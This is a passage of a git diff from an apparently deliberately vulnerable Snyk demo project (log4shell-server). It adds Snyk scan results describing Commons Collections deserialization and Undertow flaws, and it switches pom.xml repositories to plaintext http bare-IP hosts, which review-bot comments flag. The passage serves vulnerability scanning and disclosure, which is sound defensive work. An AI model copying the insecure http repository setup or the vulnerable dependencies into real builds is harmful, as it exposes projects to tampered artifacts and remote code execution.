By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n",
+ "epssDetails": {
+ "percentile": "0.88578",
+ "probability": "0.01844",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-7501"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2016-12-25T16:51:56Z",
+ "functions_new": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "className": "org.apache.commons.collections.functors.InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:52:38.421377Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ },
+ {
+ "url": "https://www.exploit-db.com/exploits/46628",
+ "title": "Exploit DB"
+ },
+ {
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
+ "title": "CISA - Known Exploited Vulnerabilities"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.088365Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
+ "epssDetails": {
+ "percentile": "0.99697",
+ "probability": "0.96729",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-4852"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2023-11-14T13:41:26.946764Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "CISA",
+ "ExploitDB",
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Attacked",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-06-03T08:53:26.834525Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ }
+ ],
+ "ok": false,
+ "dependencyCount": 13,
+ "org": "austin.doll",
+ "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n",
+ "isPrivate": true,
+ "licensesPolicy": {
+ "severities": {},
+ "orgLicenseRules": {
+ "AGPL-1.0": {
+ "licenseType": "AGPL-1.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "AGPL-3.0": {
+ "licenseType": "AGPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "Artistic-1.0": {
+ "licenseType": "Artistic-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "Artistic-2.0": {
+ "licenseType": "Artistic-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CDDL-1.0": {
+ "licenseType": "CDDL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CPOL-1.02": {
+ "licenseType": "CPOL-1.02",
+ "severity": "high",
+ "instructions": ""
+ },
+ "EPL-1.0": {
+ "licenseType": "EPL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "GPL-2.0": {
+ "licenseType": "GPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "GPL-3.0": {
+ "licenseType": "GPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.0": {
+ "licenseType": "LGPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-3.0": {
+ "licenseType": "LGPL-3.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-1.1": {
+ "licenseType": "MPL-1.1",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-2.0": {
+ "licenseType": "MPL-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MS-RL": {
+ "licenseType": "MS-RL",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "SimPL-2.0": {
+ "licenseType": "SimPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.1": {
+ "licenseType": "LGPL-2.1",
+ "severity": "medium",
+ "instructions": ""
+ }
+ }
+ },
+ "packageManager": "maven",
+ "ignoreSettings": {
+ "adminOnly": false,
+ "reasonRequired": true,
+ "disregardFilesystemIgnores": false
+ },
+ "summary": "9 vulnerable dependency paths",
+ "remediation": {
+ "unresolved": [
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7433721",
+ "title": "Memory Leak",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "low",
+ "cvssScore": 2.3,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437",
+ "title": "Red Hat Bugzilla Bug"
+ },
+ {
+ "url": "https://access.redhat.com/errata/RHSA-2024:4392",
+ "title": "Red Hat Security Advisory"
+ },
+ {
+ "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562",
+ "title": "Vulnerable Code"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "cvssV3BaseScore": 5.3,
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 2.3,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 3.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
+ "epssDetails": {
+ "percentile": "0.10901",
+ "probability": "0.00044",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-3653"
+ ],
+ "CWE": [
+ "CWE-401"
+ ],
+ "GHSA": [
+ "GHSA-ch7q-gpff-h9hp"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-07-10T07:43:42.505449Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-07-09T00:31:40Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-07-10T14:39:24.891304Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-09T13:34:05.805132Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "low"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7707751",
+ "title": "Race Condition",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290",
+ "title": "Red Hat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 7.5,
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.9,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
+ "epssDetails": {
+ "percentile": "0.21908",
+ "probability": "0.00053",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-7885"
+ ],
+ "CWE": [
+ "CWE-362"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-08-18T13:26:45.492443Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-08-07T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-08-18T13:44:23.906447Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-24T01:12:26.277956Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "medium"
+ }
+ ],
+ "upgrade": {
+ "com.unboundid:unboundid-ldapsdk@3.1.1": {
+ "upgradeTo": "com.unboundid:unboundid-ldapsdk@4.0.5",
+ "upgrades": [
+ "com.unboundid:unboundid-ldapsdk@3.1.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMUNBOUNDID-32143"
+ ]
+ },
+ "commons-collections:commons-collections@3.1": {
+ "upgradeTo": "commons-collections:commons-collections@3.2.2",
+ "upgrades": [
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-472711",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-6056408"
+ ]
+ },
+ "org.apache.logging.log4j:log4j-core@2.15.0": {
+ "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1",
+ "upgrades": [
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "vulns": [
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014"
+ ]
+ }
+ },
+ "patch": {},
+ "ignore": {},
+ "pin": {}
+ },
+ "filesystemPolicy": false,
+ "filtered": {
+ "ignore": [],
+ "patch": []
+ },
+ "uniqueCount": 9,
+ "projectName": "io.snyk:log4shell-server",
+ "displayTargetFile": "pom.xml",
+ "hasUnknownVersions": false,
+ "path": "/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server"
+}
diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml
index a14f9f85e7..8fbe79ae82 100644
--- a/log4shell-goof/log4shell-server/pom.xml
+++ b/log4shell-goof/log4shell-server/pom.xml
@@ -4,18 +4,18 @@
io.snyk
log4shell-server
- 0.0.2-SNAPSHOT
+ 0.2.3
jar
privatedeps
snapshots
- http://52.207.113.17:8081/nexus/content/repositories/snapshots
+ http://54.161.19.223:8081/nexus/content/repositories/snapshots
privatedeps
- http://52.207.113.17:8081/nexus/content/repositories/releases
+ http://54.161.19.223:8081/nexus/content/repositories/releases
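Review bot: Both rewritten repository URLs in this hunk still use plaintext `http://` to a bare IP address, so every artifact this build resolves from them arrives over an unauthenticated channel and an on-path attacker can swap in a trojaned dependency. Maven 3.8.1 and later also refuse `http://` repositories by default through the `maven-default-http-blocker` mirror, so this pom will not resolve on a current Maven unless that block is overridden. Change both entries to `https://` on a DNS name whose certificate Maven can validate, or move the host into a mirror entry in settings.xml so the pom does not hard-code a mutable IP. The element names around these URLs are not visible in the diff, so which entry is the release and which the snapshot repository is inferred from the paths.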
@@ -30,12 +30,12 @@
privatedeps
Aspose Java API
- http://52.207.113.17:8081/nexus/content/repositories/releases
+ http://35.171.191.69:8081/nexus/content/repositories/releases
2
All apart from Aspose
- http://52.207.113.17:8081/nexus/content/repositories/snapshots
+ http://35.171.191.69:8081/nexus/content/repositories/snapshots
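Review bot: This hunk points the same `/nexus/content/repositories/releases` and `/snapshots` paths at `35.171.191.69`, while the hunk above points them at `54.161.19.223`, so the pom now names two different Nexus hosts for what looks like one private repository. If both were meant to be the same server, one of the two edits is wrong; if they are intentionally different, say so in an XML comment next to the URL, e.g. `<!-- Aspose artifacts are served from a separate Nexus instance -->`. The same plaintext `http://` concern applies to both URLs here.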
diff --git a/log4shell-goof/log4shell-server/result.json b/log4shell-goof/log4shell-server/result.json
new file mode 100644
index 0000000000..037aece4a3
--- /dev/null
+++ b/log4shell-goof/log4shell-server/result.json
@@ -0,0 +1,1778 @@
+{
+ "vulnerabilities": [
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java",
+ "className": "InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "cvssV3BaseScore": 7.3,
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.078866Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 7.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
